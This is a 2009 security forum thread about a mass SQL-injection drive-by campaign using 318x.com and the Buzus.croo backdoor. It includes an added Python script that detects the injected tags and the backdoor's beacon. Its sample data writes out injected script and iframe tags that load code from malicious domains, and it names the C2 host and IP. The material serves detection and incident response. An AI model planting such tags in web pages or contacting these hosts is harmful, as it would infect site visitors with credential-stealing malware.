Author Topic: Recently a few hundred thousand webpages with drive-by exploit malware found..


polonus
Hi malware fighters,

Just recently more than 150,000 webpages have been hacked through SQL injection to place an iframe that will try to infest visitors with malicious software. The iframes in question download the first part of the malware from the domain 318x.com, and then download other malcode through various redirects and iframes. According to ScanSafe's Mary Landesman this is a "work-in-progress" attack, and the malcreants are continuously adapting and changing the malcode. Remarkably, no PDF exploits are being used, but rather a plethora of Adobe Flash, MDAC ADODB.Connection ActiveX, Microsoft Office Web Components, Microsoft Video ActiveX and Internet Explorer Uninitialized Memory Corruption holes.

If one of the exploits works, then the backdoor Buzus.croo is installed from windowssp.7766.org. This backdoor will connect through port 80 to the IP address 121.14.136.5 to send a POST request to ns.winsdown.com.cn/Countdown/count.asp. The Buzus family of malcode is, as a rule, controlled through IRC and used for credit card theft to plunder bank accounts. The number of infested pages is unclear: according to Google there are over 150,000 pages, while Yahoo counts up to 300,000 hacked webpages.
 Re:
http://blog.scansafe.com/journal/2009/12/9/318x-sql-injection-claims-125000.html

http://www.google.nl/search?hl=en&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&hs=dd9&q=%3Cscript+src%3Dhttp%3A%2F%2F318x.com%3E&aq=f&oq=&aqi=

http://search.yahoo.com/search;_ylt=A0geu9aIQiFLMcIA38JXNyoA?p=%3Cscript+src%3Dhttp%3A%2F%2F318x.com%3E&fr2=sb-top&fr=yfp-t-701&sao=0

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!
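As an added example (not part of polonus's post and not ScanSafe's tooling), the following Python turns the indicators named above into two checks a webmaster or SOC analyst could run: a scan of page HTML for injected script/iframe tags loading from 318x.com or windowssp.7766.org, and a scan of proxy log lines for the Buzus.croo POST beacon to ns.winsdown.com.cn/Countdown/count.asp (or to the bare IP 121.14.136.5). The HTML snippet and the log format (timestamp, client, destination IP, method, URL, status) are constructed for the example; they are not captured data from the incident.

```python
"""Added example: detect the 318x.com injection in HTML and the Buzus beacon in
proxy logs, using only the indicators named in the forum post. Sample HTML and
log lines below are constructed, not captured from the incident."""
import re
from urllib.parse import urlparse

# Point-in-time indicators from the post; the attackers were changing them, so
# treat this as a starting list, not a complete one.
INJECTION_DOMAINS = {"318x.com", "windowssp.7766.org"}
BEACON_HOSTS = {"ns.winsdown.com.cn"}
BEACON_IPS = {"121.14.136.5"}
BEACON_PATH = "/countdown/count.asp"

# Matches <script ... src=...> and <iframe ... src=...>, with quoted or
# unquoted src, since the injected tag is typically unquoted.
TAG_RE = re.compile(r"<(script|iframe)\b[^>]*?\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)


def _host(url):
    # Injected src values often have no path and sometimes no scheme.
    if "://" not in url:
        url = "http://" + url
    return (urlparse(url).hostname or "").lower()


def _matches(host, domains):
    # Exact domain or a subdomain of it; avoids matching e.g. "x318x.com".
    return any(host == d or host.endswith("." + d) for d in domains)


def find_injected_tags(html):
    """Return (tag, src) pairs for script/iframe elements loading from indicator domains."""
    return [(m.group(1).lower(), m.group(2))
            for m in TAG_RE.finditer(html)
            if _matches(_host(m.group(2)), INJECTION_DOMAINS)]


def find_beacons(log_text):
    """Return (timestamp, client, url) for lines that look like the Buzus.croo beacon.

    A hit needs a POST to the beacon path plus either the known Host name or the
    known destination IP, so a sample that swaps one of them is still caught.
    Log format (constructed): ts client dst_ip method url status
    """
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 6:
            continue
        ts, client, dst_ip, method, url, _status = parts[:6]
        if method.upper() != "POST":
            continue
        u = urlparse(url)
        host = (u.hostname or "").lower()
        if u.path.lower() == BEACON_PATH and (
                host in BEACON_HOSTS or host in BEACON_IPS or dst_ip in BEACON_IPS):
            hits.append((ts, client, url))
    return hits


# Constructed sample data so the script runs stand-alone.
SAMPLE_HTML = """<html><head><title>shop</title>
<script src=http://318x.com></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
</head><body><iframe src='http://windowssp.7766.org/x.htm' width=0 height=0></iframe>
</body></html>"""

SAMPLE_LOG = """2009-12-09T10:15:32 10.0.0.12 121.14.136.5 POST http://ns.winsdown.com.cn/Countdown/count.asp 200
2009-12-09T10:15:40 10.0.0.12 74.125.77.99 GET http://www.google.com/ 200
2009-12-09T10:16:01 10.0.0.33 121.14.136.5 POST http://121.14.136.5/Countdown/count.asp 200
2009-12-09T10:16:09 10.0.0.33 121.14.136.5 GET http://ns.winsdown.com.cn/Countdown/count.asp 404"""

if __name__ == "__main__":
    for tag, src in find_injected_tags(SAMPLE_HTML):
        print("injected tag:", tag, src)
    for ts, client, url in find_beacons(SAMPLE_LOG):
        print("beacon:", ts, client, url)
```

The HTML check is meant for a crawl of your own site (the SQL-injected markup lands in database-backed pages, so check rendered output, not just templates); the log check is for an outbound proxy or web-filter log. Because the campaign kept changing domains, the domain sets are the part to keep updated.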

YoKenny
BlueConnex/EuroConnex (AS29550): Riccom LTD (91.212.107.*, AS49038, riccom-cy.org)
http://hphosts.blogspot.com/2009/12/blueconnexeuroconnex-as29550-riccom-ltd.html